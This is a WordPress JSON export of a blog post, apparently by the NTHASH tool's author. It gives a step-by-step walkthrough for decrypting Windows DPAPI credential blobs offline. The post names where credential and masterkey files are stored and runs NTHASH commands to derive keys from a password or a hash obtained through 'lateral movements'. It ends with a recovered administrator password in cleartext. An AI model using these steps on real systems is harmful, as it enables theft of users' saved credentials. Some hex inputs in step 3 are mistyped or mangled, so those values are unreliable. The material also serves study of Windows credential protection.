{"id":2230,"date":"2019-12-30T22:16:20","date_gmt":"2019-12-30T21:16:20","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2230"},"modified":"2022-08-03T18:26:34","modified_gmt":"2022-08-03T16:26:34","slug":"prive-nthash-and-dpapi-secrets-1","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2230","title":{"rendered":"nthash and dpapi secrets #1"},"content":{"rendered":"

Lets decrypt a user credentials (which happen to be enctyped in dpapi blobs).<\/p>\n

5 steps:
\n-look at the encrypted blob\/credential
\n-look at the encrypted masterkey
\n-retrieve the sha1 user password and compute the sha1-hmac key
\n-decrypt the encrypted masterkey
\n-decrypt the encrypted blob\/credential
\n-conclusion<\/p>\n

1\/look at the encrypted blob\/credential<\/p>\n

User credentials are located here:
\nC:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials
\nC:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials<\/p>\n

NTHASH-win64.exe \/decodeblob
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Credentials\\444F0F078CB16849842B0928EF18C7E1<\/strong><\/p>\n

\"\"<\/p>\n

->note the dwFlags:0 = user
\nWe can see it is using masterkey ae222549-867a-4269-b29f-49500e8842c8<\/strong>.<\/p>\n

2\/look at the encrypted masterkey<\/p>\n

Masterkeys are located here:
\nC:\\Users\\username\\AppData\\Roaming\\Microsoft\\Protect\\sid<\/p>\n

NTHASH-win64.exe \/decodemk
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2427513087-2265021005-1965656450-1001\\ae222549-867a-4269-b29f-49500e8842c8<\/strong><\/p>\n

\"\"<\/p>\n

3\/retrieve the sha1 user password and compute the sha1-hmac key<\/p>\n

To decrypt this masterkey, you either know the cleartext password or you know its SHA1 form (retrieved thru some other lateral movements).<\/p>\n

If you know the cleartext password, then lets computer its SHA1.
\nSkip the below if you already have the SHA1 password.<\/p>\n

NTHASH-win64.exe \/widestringtohexa \/input:Password12345
\nNTHASH 1.7 x64 by erwan2212@gmail.com<\/strong>
\nwidestringtobyte
\n500061007300730077006F007200640031003200330034003500<\/p>\n

NTHASH-win64.exe \/gethash \/mode:SHA1 \/input:5500061007300730077006F007200640031003200330034003500<\/strong>
\nNTHASH 1.7 x64 by erwan2212@gmail.com
\ngethash
\n0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0<\/p>\n

Note that you can run the 2 previous commands in one go :
\nNTHASH-win64.exe \/widestringtohexa \/input:Password12345 | NTHASH-win64.exe \/gethash \/mode:SHA1<\/strong><\/p>\n

Now, lets compute the sha1-hmac key to decrypt the masterkey.
\nFor this we need the SHA1 password + user sid.<\/p>\n

NTHASH-win64.exe \/widestringtohexa \/input:S-1-5-21-2427513087-2265021005-1965656450-1001\\0<\/strong>
\nNTHASH 1.8 x64 by erwan2212@gmail.com
\nwidestringtobyte
\n53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D0031003000300031000000<\/p>\n

(Note the \\0 to make it a null widechar terminated string)<\/p>\n

NTHASH-win64.exe \/gethmac \/mode:SHA1 \/key:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
\n\/input:530020031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003
\n00360035003000320031003000300035002D0031003900360035003600350036003400350030002
\n0031003000300031000000<\/strong>
\nNTHASH 1.7 x64 by erwan2212@gmail.com
\ngethmac
\n262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5<\/p>\n

4\/decrypt the encrypted masterkey<\/p>\n

NTHASH-win64.exe \/decodemk
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2427513087-2265021005-1965656450-1001\\ae222549-867a-4269-b29f-49500e8842c8
\n\/input:262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5<\/strong>
\nNTHASH 1.7 x64 by erwan2212@gmail.com
\n**** Unprotecting Blob ****
\nKEY:83D3D812E50FAB6F83DA070D6C566DCFE3248A1AD873AA1D222F6B41342890EEBD790388FE2A
\n21680A081723AA0C7B39EFBA5B16BB5D948B947140838F1F5383
\nSHA1:38920930CFB2A1CE61F9CB52153025535F548F53<\/p>\n

Note : with latest version you can skip step 3 and execute the below (i.e provide the SHA1 user password and let NTHASH compute the hmac):
\nnthash-win64 \/decodemk
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2427513087-2265021005-1965656450-1001\\75380869-42A8-42EC-9E9B-8518F42802EE
\n\/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0<\/strong><\/p>\n

5\/decrypt the encrypted blob\/credential<\/p>\n

nthash-win64 \/decodeblob
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Credentials\\444F0F078CB16849842B0928EF18C7E1
\n\/input:38920930CFB2A1CE61F9CB52153025535F548F53<\/strong>
\nNTHASH 1.7 x64 by erwan2212@gmail.com
\n**** Decoding Cred Blob ****
\ncredFlags:48
\ncredSize:194
\nType:2
\nFlags:0
\nLastWritten:15\/12\/2019 19:16:09
\nTargetName:Domain:target=192.168.1.188
\nunkdata:
\ncomment:SspiPfc
\ntargetalias:
\nusername:ERWAN-PC2\\administrateur
\nCredentialBlob:weakpassword<\/p>\n

You can run it in one command eventually:
\nnthash-win64 \/decodemk
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2427513087-2265021005-1965656450-1001\\75380869-42A8-42EC-9E9B-8518F42802EE
\n\/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0 | nthash-win64 \/decodeblob
\n\/binary:C:\\Users\\erwan\\AppData\\Roaming\\Microsoft\\Credentials\\444F0F078CB16849842B0928EF18C7E1 <\/strong><\/p>\n

6\/Conclusion ?<\/p>\n

You dont need to be online or run as the user to retrieve secrets :
\nIf you own a blob, its associated masterkey and the cleartext password OR the sha1 password, you can decrypt these offline.<\/p>\n","protected":false},"excerpt":{"rendered":"

Lets decrypt a user credentials (which happen to be enctyped in dpapi blobs). 5 steps: -look at the encrypted blob\/credential -look at the encrypted masterkey -retrieve the sha1 user password and compute the sha1-hmac key -decrypt the encrypted masterkey -decrypt the encrypted blob\/credential -conclusion 1\/look at the encrypted blob\/credential User credentials are located here: C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials […]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[119],"class_list":["post-2230","post","type-post","status-publish","format-standard","hentry","category-nthash","tag-dpapi","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2230"}],"version-history":[{"count":18,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2230\/revisions"}],"predecessor-version":[{"id":2333,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2230\/revisions\/2333"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2230"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2230"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}